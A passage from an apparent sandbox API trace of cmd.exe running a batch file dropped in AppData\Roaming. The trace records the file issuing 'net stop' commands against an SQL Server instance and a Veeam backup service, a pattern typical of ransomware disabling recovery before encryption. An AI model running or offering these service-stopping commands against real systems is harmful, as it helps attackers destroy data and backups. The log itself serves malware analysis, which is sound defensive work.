(HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0047.469] GetProcessHeap () returned 0x3e0000 [0047.469] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0047.469] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0047.469] GetProcessHeap () returned 0x3e0000 [0047.469] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0047.469] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0047.469] GetProcessHeap () returned 0x3e0000 [0047.469] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0047.469] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0047.469] GetProcessHeap () returned 0x3e0000 [0047.469] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0047.470] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0047.470] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0047.470] GetLastError () returned 0x2 [0047.470] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0047.470] GetLastError () returned 0x2 [0047.470] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0047.470] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0047.470] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0047.470] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0047.470] GetLastError () returned 0x2 [0047.470] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0047.470] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0047.471] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0047.471] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0047.471] SetErrorMode (uMode=0x0) returned 0x1 [0047.471] GetProcessHeap () returned 0x3e0000 [0047.471] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0047.471] GetProcessHeap () returned 0x3e0000 [0047.471] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0047.471] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0047.471] GetProcessHeap () returned 0x3e0000 [0047.471] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0047.471] GetProcessHeap () returned 0x3e0000 [0047.471] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0047.471] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0047.471] GetProcessHeap () returned 0x3e0000 [0047.471] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0047.471] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0047.471] GetProcessHeap () returned 0x3e0000 [0047.471] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0047.471] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0047.471] GetProcessHeap () returned 0x3e0000 [0047.471] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0047.471] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0047.471] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0047.472] GetLastError () returned 0x2 [0047.472] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0047.472] GetLastError () returned 0x2 [0047.472] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0047.472] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0047.472] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0047.472] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0047.472] GetLastError () returned 0x2 [0047.472] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0047.472] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0047.472] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0047.473] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0047.473] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0047.473] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0047.473] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0047.473] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSSQL$SYSTEM_BGC /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSSQL$SYSTEM_BGC /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop MSSQL$SYSTEM_BGC /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x8b0, dwThreadId=0xa10)) returned 1 [0047.476] CloseHandle (hObject=0x74) returned 1 [0047.476] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0047.476] GetProcessHeap () returned 0x3e0000 [0047.476] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0047.476] GetEnvironmentStringsW () returned 0x3f8408* [0047.477] GetProcessHeap () returned 0x3e0000 [0047.477] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0047.477] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0047.477] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0047.641] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0047.641] CloseHandle (hObject=0x78) returned 1 [0047.641] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0047.641] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0047.641] GetProcessHeap () returned 0x3e0000 [0047.641] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0047.641] GetEnvironmentStringsW () returned 0x3f8408* [0047.641] GetProcessHeap () returned 0x3e0000 [0047.641] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0047.641] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0047.641] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0047.641] GetProcessHeap () returned 0x3e0000 [0047.641] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0047.641] GetEnvironmentStringsW () returned 0x3f8408* [0047.641] GetProcessHeap () returned 0x3e0000 [0047.642] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0047.642] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0047.642] GetProcessHeap () returned 0x3e0000 [0047.642] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0047.642] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0047.642] _get_osfhandle (_FileHandle=1) returned 0x264 [0047.642] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0047.642] _get_osfhandle (_FileHandle=1) returned 0x264 [0047.642] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0047.642] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0047.642] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0047.643] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0047.643] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0047.643] SetConsoleInputExeNameW () returned 0x1 [0047.643] GetConsoleOutputCP () returned 0x1b5 [0047.643] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0047.643] SetThreadUILanguage (LangId=0x0) returned 0x409 [0047.643] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0047.644] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0047.644] _get_osfhandle (_FileHandle=3) returned 0x78 [0047.644] SetFilePointer (in: hFile=0x78, lDistanceToMove=2115, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x843 [0047.644] GetProcessHeap () returned 0x3e0000 [0047.644] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0047.644] GetProcessHeap () returned 0x3e0000 [0047.644] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0047.644] GetProcessHeap () returned 0x3e0000 [0047.644] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0047.644] GetProcessHeap () returned 0x3e0000 [0047.644] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0047.644] GetProcessHeap () returned 0x3e0000 [0047.644] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0047.644] GetProcessHeap () returned 0x3e0000 [0047.644] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0047.644] GetProcessHeap () returned 0x3e0000 [0047.644] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0047.644] GetProcessHeap () returned 0x3e0000 [0047.644] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0047.644] GetProcessHeap () returned 0x3e0000 [0047.644] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0047.644] GetProcessHeap () returned 0x3e0000 [0047.644] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0047.645] GetProcessHeap () returned 0x3e0000 [0047.645] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0047.645] GetProcessHeap () returned 0x3e0000 [0047.645] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0047.645] GetProcessHeap () returned 0x3e0000 [0047.645] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0047.645] _get_osfhandle (_FileHandle=3) returned 0x78 [0047.645] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x843 [0047.645] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x107e, lpOverlapped=0x0) returned 1 [0047.645] SetFilePointer (in: hFile=0x78, lDistanceToMove=2143, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x85f [0047.645] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=28, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop VeeamBrokerSvc /y\r\n\r\ny\r\ny\r\n /y\r\ny\r\nΓÇ¥ /y\r\nlures\r\nnded\r\n") returned 28 [0047.645] _get_osfhandle (_FileHandle=3) returned 0x78 [0047.645] GetFileType (hFile=0x78) returned 0x1 [0047.645] _get_osfhandle (_FileHandle=3) returned 0x78 [0047.645] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x85f [0047.646] GetProcessHeap () returned 0x3e0000 [0047.646] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0047.646] GetProcessHeap () returned 0x3e0000 [0047.646] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0047.646] _tell (_FileHandle=3) returned 2143 [0047.646] _close (_FileHandle=3) returned 0 [0047.647] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0047.647] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0047.647] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0047.647] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0047.647] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0047.647] _wcsicmp (_String1="net", _String2="CD") returned 11 [0047.647] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0047.647] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0047.647] _wcsicmp (_String1="net", _String2="REN") returned -4 [0047.647] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0047.647] _wcsicmp (_String1="net", _String2="SET") returned -5 [0047.647] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0047.647] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0047.647] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0047.647] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0047.647] _wcsicmp (_String1="net", _String2="MD") returned 1 [0047.647] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0047.647] _wcsicmp (_String1="net", _String2="RD") returned -4 [0047.647] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0047.647] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0047.647] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0047.647] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0047.647] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0047.647] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0047.647] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0047.647] _wcsicmp (_String1="net", _String2="VER") returned -8 [0047.648] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0047.648] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0047.648] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0047.648] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0047.648] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0047.648] _wcsicmp (_String1="net", _String2="START") returned -5 [0047.648] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0047.648] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0047.648] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0047.648] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0047.648] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0047.648] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0047.648] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0047.648] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0047.648] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0047.648] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0047.648] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0047.648] SetErrorMode (uMode=0x0) returned 0x1 [0047.648] GetProcessHeap () returned 0x3e0000 [0047.648] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0047.648] GetProcessHeap () returned 0x3e0000 [0047.648] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0047.648] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0047.649] GetProcessHeap () returned 0x3e0000 [0047.649] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0047.649] GetProcessHeap () returned 0x3e0000 [0047.649] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0047.649] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0047.649] GetProcessHeap () returned 0x3e0000 [0047.649] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0047.649] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0047.649] GetProcessHeap () returned 0x3e0000 [0047.649] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0047.649] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0047.649] GetProcessHeap () returned 0x3e0000 [0047.649] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0047.649] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0047.649] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0047.649] GetLastError () returned 0x2 [0047.649] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0047.650] GetLastError () returned 0x2 [0047.650] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0047.650] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0047.650] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0047.650] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0047.650] GetLastError () returned 0x2 [0047.650] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0047.650] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0047.651] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0047.651] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0047.651] SetErrorMode (uMode=0x0) returned 0x1 [0047.651] GetProcessHeap () returned 0x3e0000 [0047.651] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0047.651] GetProcessHeap () returned 0x3e0000 [0047.651] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0047.651] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0047.651] GetProcessHeap () returned 0x3e0000 [0047.651] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0047.651] GetProcessHeap () returned 0x3e0000 [0047.652] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0047.652] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0047.652] GetProcessHeap () returned 0x3e0000 [0047.652] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0047.652] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0047.652] GetProcessHeap () returned 0x3e0000 [0047.652] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0047.652] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0047.652] GetProcessHeap () returned 0x3e0000 [0047.652] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0047.652] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0047.652] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0047.652] GetLastError () returned 0x2 [0047.652] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0047.652] GetLastError () returned 0x2 [0047.652] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0047.653] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0047.653] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0047.653] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0047.653] GetLastError () returned 0x2 [0047.653] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0047.653] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0047.653] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0047.653] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0047.654] UpdateProcThreadAttribute (in: 